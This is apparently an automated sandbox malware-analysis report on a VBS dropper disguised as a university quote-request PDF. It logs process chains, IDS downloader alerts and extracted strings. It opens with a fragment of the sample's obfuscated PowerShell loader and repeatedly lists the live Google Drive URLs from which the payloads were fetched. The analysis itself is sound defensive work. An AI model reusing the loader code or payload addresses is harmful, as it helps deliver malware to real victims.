ClaOEkspbPinnJCen.e.dskCpredTHy,o SlacsFagmyGameSInert pheeCarnmBall.pidd$Indss djotGadgRSejlGTermh KnaAKrign AppD liglFagfEMegaN');Spuledes ($forevigende);Spuledes (Paining 'Lago$Esa,UNapod mof C ll.risa.ulkaveksdNonpdRente A,enFazieSul,sPrev. ,xeH Fo,eFritaLuded UdfeUdplrK.ntsVali[ L n$LegaUD.pin BerfDamea.ntiuAnt cstryequict Tare U,bdHvid] Per=Frdi$UncocFormrLittaP kevDawfemacan esuh ArbeFru aExtrrKun tF rueaglyd');$svaledes=Paining '
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4232, ProcessName: svchost.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T20:37:43.184571+010028033053Unknown Traffic192.168.2.1049685142.250.186.174443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T20:38:35.543821+010028032702Potentially Bad Traffic192.168.2.1049696142.250.186.174443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbsVirustotal: Detection: 16%Perma Link
              Source: ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbsReversingLabs: Detection: 15%
              Source: Yara matchFile source: 00000010.00000002.1859072664.000000000064C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7632, type: MEMORYSTR
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.10:49682 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.10:49685 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.10:49687 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.10:49696 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.10:49697 version: TLS 1.2
              Source: Binary string: m.Core.pdb{ source: powershell.exe, 0000000E.00000002.1696135533.0000000008C32000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1696135533.0000000008C10000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: (non)Standard Marshaling for IWbemObjectSinkEx.pdb source: powershell.exe, 00000004.00000002.1380327137.00000225FA249000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0QC HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0QC&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49685 -> 142.250.186.174:443
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49696 -> 142.250.186.174:443
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0QC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0QC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0QC HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0QC&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: Host_6637.6637.6637.657e
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 0000000E.00000002.1689306097.0000000007B44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: svchost.exe, 00000006.00000002.2385015226.000001B674000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: wscript.exe, 00000000.00000003.1120709993.000001DF4E52E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1121269324.000001DF4E539000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1122327472.000001DF4E539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: wscript.exe, 00000000.00000003.1120709993.000001DF4E52E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1121269324.000001DF4E539000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1113401012.000001DF4E5D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1122327472.000001DF4E539000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1113527167.000001DF4E5D8000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000000.00000003.1113401012.000001DF4E586000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1113527167.000001DF4E5AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7cd8671cae473
              Source: wscript.exe, 00000000.00000003.1113401012.000001DF4E586000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1113527167.000001DF4E5AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7cd8671cae
              Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: powershell.exe, 00000004.00000002.1371459789.0000022590070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.1344746282.0000022580227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.1344746282.0000022580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1655297069.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.1344746282.0000022580227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 0000000E.00000002.1689306097.0000000007BAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
              Source: powershell.exe, 00000004.00000002.1344746282.0000022580001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000E.00000002.1655297069.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBYq
              Source: powershell.exe, 00000004.00000002.1344746282.000002258049F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.000002258049B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.0000022580483000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000687000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765254963.0000000000687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000004.00000002.1371459789.0000022590070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.1371459789.0000022590070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.1371459789.0000022590070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.g
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.go
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goo
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goog
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googl
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.c
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.co
              Source: powershell.exe, 00000004.00000002.1344746282.0000022580227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.1859072664.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: msiexec.exe, 00000010.00000002.1859072664.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/D
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?e
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?ex
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?exp
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expor
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=d
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=do
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=dow
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=down
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downl
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downlo
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&i
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7d
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dw
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwf
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfR
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRP
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPh
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6A
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AA
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6i
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6ir
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irY
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irYY
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irYY6
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63b
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bw
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwG
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwGY
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwGYe
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwGYe4
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0Q
              Source: powershell.exe, 00000004.00000002.1344746282.000002258172D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0QC
              Source: powershell.exe, 00000004.00000002.1344746282.0000022580227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0QCP
              Source: powershell.exe, 0000000E.00000002.1655297069.0000000005046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0QCXR
              Source: msiexec.exe, 00000010.00000002.1874917486.0000000020A00000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.1859072664.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf
              Source: msiexec.exe, 00000010.00000002.1859072664.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf3
              Source: msiexec.exe, 00000010.00000002.1859072664.000000000060A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZflJ
              Source: powershell.exe, 00000004.00000002.1344746282.000002258049F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: msiexec.exe, 00000010.00000003.1824595082.0000000000687000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.1859072664.0000000000680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: powershell.exe, 00000004.00000002.1344746282.000002258049F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.00000225805BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1i7dwfRPhv9u6AAd6irYY63bwGYe4-0QC&export=download
              Source: msiexec.exe, 00000010.00000003.1824595082.0000000000687000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.1859072664.0000000000680000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000687000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.1859072664.0000000000670000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765254963.0000000000687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf&export=download
              Source: msiexec.exe, 00000010.00000003.1824595082.0000000000687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf&export=download&
              Source: msiexec.exe, 00000010.00000003.1824595082.0000000000687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf&export=downloadT
              Source: msiexec.exe, 00000010.00000003.1824595082.0000000000687000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.1859072664.0000000000680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf&export=downloadof
              Source: msiexec.exe, 00000010.00000002.1859072664.0000000000666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf&export=downloadvF
              Source: msiexec.exe, 00000010.00000002.1859072664.0000000000666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lG2PFpFYkSI6X_VCBq4gFHA1GeoYlhZf&export=downloadzF
              Source: msiexec.exe, 00000010.00000003.1824595082.0000000000687000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.1859072664.0000000000680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/y
              Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
              Source: svchost.exe, 00000006.00000003.1202986744.000001B673D90000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
              Source: powershell.exe, 00000004.00000002.1344746282.0000022580227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.1371459789.0000022590070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1344746282.000002258049F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.000002258049B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.0000022580483000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000687000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765254963.0000000000687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
